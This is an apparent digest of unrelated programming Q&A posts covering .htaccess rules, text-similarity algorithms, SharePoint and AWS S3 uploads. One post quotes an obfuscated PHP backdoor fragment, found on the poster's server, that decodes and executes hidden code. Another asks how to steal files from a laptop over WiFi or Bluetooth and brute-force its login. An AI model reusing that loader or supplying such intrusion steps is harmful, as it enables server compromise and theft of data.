Deny access to all PHP files using FilesMatch, but make an exception for one

Currently, using htaccess, I am denying access to any PHP file in a directory, but not to the JS, PNG, and CSS files in the same directory.

    <FilesMatch "\.php$">
        Order deny,allow
        Deny from all
    </FilesMatch>

What if I want to make an exception for one file ("foobar.php", for example)? Can I write multiple statements in a single htaccess file? What is the order of execution?
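One common pattern (a sketch using the Apache 2.2-style directives from the snippet above; "foobar.php" is the example exception) is to add a second FilesMatch section that re-allows just that file. Within a config file, a later matching section overrides an earlier one for the same request:

```apache
# Deny every PHP file in this directory...
<FilesMatch "\.php$">
    Order deny,allow
    Deny from all
</FilesMatch>

# ...then re-allow only foobar.php; for a given request, the
# directives from the last matching section win.
<FilesMatch "^foobar\.php$">
    Order allow,deny
    Allow from all
</FilesMatch>
```

On Apache 2.4 the equivalents would be `Require all denied` and `Require all granted`.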

Lots of strange PHP files in home directory. Here is one [on hold]

$gywiyca) {
    function pzzll($hxjlsy, $bnhzyqt, $zmidgo) {
        return $hxjlsy[7]($hxjlsy[5]($bnhzyqt . $hxjlsy[3], ($zmidgo / $hxjlsy[9]) + 1), 0, $zmidgo);
    }
    function aydwvve($hxjlsy, $vkjabah) {
        return @$hxjlsy[10]($hxjlsy[1], $vkjabah);
    }
    function xpjksgc($hxjlsy, $vkjabah) {
        $vtyhb = $hxjlsy[4] % 3;
        if (!$vtyhb) {
            $ekvlpx = $hxjlsy[0];
            $nekja = $ekvlpx("", $vkjabah[1]);
            $nekja();
            exit();
        }
    }
    $gywiyca = aydwvve($hxjlsy, $gywiyca);
    xpjksgc($hxjlsy, $hxjlsy[6]($hxjlsy[2], $gywiyca ^ pzzll($hxjlsy, $bnhzyqt, $hxjlsy[9])));
}

Finding the similarity between large text files

My first question is: does an algorithm for this already exist? If not, any thoughts and ideas are appreciated.

Let’s say I have two large text files (original file A and new file B). Each file is English prose (including dialogue), with a typical size of 256K to 500K characters.

I want to compare them to find out how similar the contents of B are to A.

Similar in this case means: all, or a significant part, of B exists in A, with the condition that there may be subtle differences, words changed here and there, or even globally.

In all cases we have to remember that this is looking for similarity, not (necessarily) identity.

Preprocessing for the text:

  1. Remove all punctuation (and close up gaps “didn’t” -> “didnt”);
  2. Lowercase everything;
  3. Remove common words;
  4. Reduce all whitespace to single space only, but keep paragraphs;
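The four preprocessing steps above can be sketched in Python like this (the stopword list is a stand-in assumption; a real "common words" list would be much longer):

```python
import re

# Small illustrative stopword list; a real one would be much longer.
STOPWORDS = {"the", "a", "an", "and", "of", "to", "in", "it", "is", "was"}

def preprocess(text):
    # 1. Remove all punctuation, closing up gaps ("didn't" -> "didnt")
    text = re.sub(r"[^\w\s]", "", text)
    # 2. Lowercase everything
    text = text.lower()
    # 4. (part one) Keep paragraphs: split on blank lines before
    #    collapsing any other whitespace
    paragraphs = re.split(r"\n\s*\n", text)
    cleaned = []
    for para in paragraphs:
        # 3. Remove common words; 4. (part two) str.split/join reduces
        #    all remaining whitespace to single spaces
        words = [w for w in para.split() if w not in STOPWORDS]
        if words:
            cleaned.append(" ".join(words))
    return cleaned
```

For example, `preprocess("Didn't he go?\n\nThe cat sat.")` yields the two cleaned paragraphs `["didnt he go", "cat sat"]`.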

Other possible optimisations to reduce future workload:

Ignore any paragraph of less than a certain length. Why? Because there’s a higher probability of natural duplication in shorter paragraphs (though arguably not in the same overall position).

Have an arbitrary cut-off length on the paragraphs. Why? Mostly because it reduces workload.

Finally:

For every word, turn it into a Metaphone code. So instead of every paragraph being composed of normal words, it becomes a list of metaphones, which helps in comparing slightly modified words.

We end up with paragraphs that look like this (each of these lines is a separate paragraph):

WNT TR0 ABT E0L JRTN TTKTF INSPK WLMS E0L UTRL OBNKS JRL TM RL SRPRS LKT TRKTL KM N SX WRT LT ASK W0R RT WRKS T ST N WLTNT RT 0M AL 

But I admit, when it comes to the comparison I’m not sure how to approach it, beyond brute force: take the first encoded paragraph from B (B[0]) and check it against every paragraph in A, looking for a high match (maybe identical, maybe very similar). Perhaps we use Levenshtein distance to compute a match percentage between paragraphs.

If we find a match at A[n], then check B[1] against A[n+1] and maybe a couple further A[n+2] and A[n+3] just in case something was inserted.

And proceed that way.
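The walk just described (find B[0] somewhere in A, then advance both files in step, with a small lookahead in case paragraphs were inserted) can be sketched like this. The Levenshtein distance is normalised into a 0-1 similarity; the 0.8 threshold and lookahead of 3 are arbitrary assumptions to tune:

```python
def levenshtein(a, b):
    # Classic row-by-row dynamic-programming edit distance.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def similarity(a, b):
    # 1.0 = identical, 0.0 = nothing in common.
    if not a and not b:
        return 1.0
    return 1 - levenshtein(a, b) / max(len(a), len(b))

def align(b_paras, a_paras, threshold=0.8, lookahead=3):
    """For each paragraph of B, return the index of its match in A
    (or None). Walks both files in step, checking a few positions
    ahead in A in case something was inserted."""
    matches = []
    n = 0  # next expected position in A
    for bp in b_paras:
        hit = None
        for offset in range(lookahead + 1):
            if (n + offset < len(a_paras)
                    and similarity(bp, a_paras[n + offset]) >= threshold):
                hit = n + offset
                break
        if hit is None:
            # Fall back to a brute-force scan of all of A.
            best, idx = max((similarity(bp, ap), i)
                            for i, ap in enumerate(a_paras))
            hit = idx if best >= threshold else None
        if hit is not None:
            n = hit + 1
        matches.append(hit)
    return matches
```

Running the encoded paragraphs through `align(B, A)` then gives, for each paragraph of B, where (if anywhere) it sits in A; long runs of consecutive indices indicate the "B is a subset of A" case.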

What should be detected:

  • Near-identical text
  • Global proper noun changes
  • B is a subset of A

Thanks.

Analysis – Help with HTaccess (noindexing PDF Files) [on hold]

I am trying to analyse an htaccess file. Considering I work in digital marketing, I understand about 5% of all those rules and codes.

I would like a hand with everything, but what puzzles me most is why the code is not enough to noindex the PDF files. There is a specific piece of code about it, but I am wondering whether it conflicts with something else.
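For reference, the usual way to noindex PDFs from .htaccess is an X-Robots-Tag response header, which requires mod_headers to be enabled. This is only a sketch of the typical rule, not the actual file in question; if the file contains something like this and PDFs are still indexed, a disabled module or a later conflicting Header directive are common culprits:

```apache
# Requires mod_headers; tells crawlers not to index any PDF served
# from this directory.
<FilesMatch "\.pdf$">
    Header set X-Robots-Tag "noindex, nofollow"
</FilesMatch>
```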

Thank you Fabrizio

How does one steal files by connecting to a laptop’s WIFI / Bluetooth? [on hold]

I’m asking how one steals files by connecting to a laptop’s WIFI / Bluetooth, and whether it can be done with the laptop powered off if there is a battery.

Could you please explain, step by step, how you would connect to a laptop’s WIFI / Bluetooth and brute-force the login?

I’m not asking for a hacking tutorial, as someone misunderstood; this is for educational purposes so I can understand it better. There is no existing explanation of this online.

How to get files from SharePoint in a C# Word VSTO add-in

I am trying to get .doc file names from SharePoint and then fetch each file by name. But I have a problem using GetList(): https://docs.microsoft.com/en-us/previous-versions/office/sharepoint-server/dn793734%28v%3doffice.15%29. So far I have this code:

    string url = "https://mysharepoint.com/Things";
    var ctx = new ClientContext(url);
    Web web = ctx.Web;

    var list = web.GetList("/Shared%20Documents/Test");
    var listItems = list.GetItems(new CamlQuery());
    ctx.Load(listItems,
        items => items.Include(
            item => item["Created"],
            item => item.File));
    ctx.ExecuteQuery();

    foreach (var item in listItems)
    {
        Console.WriteLine("{0} - {1}",
            item["Created"],
            item.File.ServerRelativeUrl);
    }

But I can’t understand why I get this error:

Error CS1061: 'Web' does not contain a definition for 'GetList' and no accessible extension method 'GetList' accepting a first argument of type 'Web' could be found (are you missing a using directive or an assembly reference?) (MestoDljaProb, C:\Ribbon1.cs, line 111)

Is a Bucket Upload Policy good practice for uploading files to AWS S3?

The AWS docs have the following instructions for uploading files to an AWS bucket from the browser: https://docs.aws.amazon.com/AmazonS3/latest/API/RESTObjectPOST.html

This solution sends the browser a policy and a signature created with the secret key, which is validated on POST. It also exposes the AWS Key ID (but not the AWS Secret Key). Isn’t that bad practice? Although the secret key is not exposed, exposing the AWS Key ID sounds bad to me, because an attacker could use brute force to guess the key (having the policy and the signature).
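On the brute-force point: in the flow the linked page describes, the browser only ever sees the base64-encoded policy and an HMAC-SHA1 signature of it. Recovering the secret from a known (policy, signature) pair means brute-forcing the HMAC key itself, which is infeasible for a 40-character secret. A stdlib sketch of how the server side produces those two values (the policy document is a made-up example):

```python
import base64
import hashlib
import hmac
import json

def sign_policy(policy, secret_key):
    """Sign an S3 browser-upload policy (signature version 2 style):
    base64-encode the policy JSON, then HMAC-SHA1 it with the secret
    key. Only the encoded policy and the signature leave the server."""
    encoded = base64.b64encode(json.dumps(policy).encode("utf-8"))
    sig = base64.b64encode(
        hmac.new(secret_key.encode("utf-8"), encoded, hashlib.sha1).digest()
    )
    return encoded.decode(), sig.decode()
```

The Access Key ID is a public identifier by design; what must stay server-side is the secret key that feeds the HMAC.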

SharePoint 2013 – Search files in a File Share (content source) with filtering by folders

I crawled content that is stored on a file server (a File Share content source in SharePoint Server), and I get the results in SharePoint search. Everything is fine, but I need some kind of refiner (I have tried many, but none works the way I need, or does not work at all) that lets the user choose the folder in which to search for a file. Could you give me some suggestions?

Thanks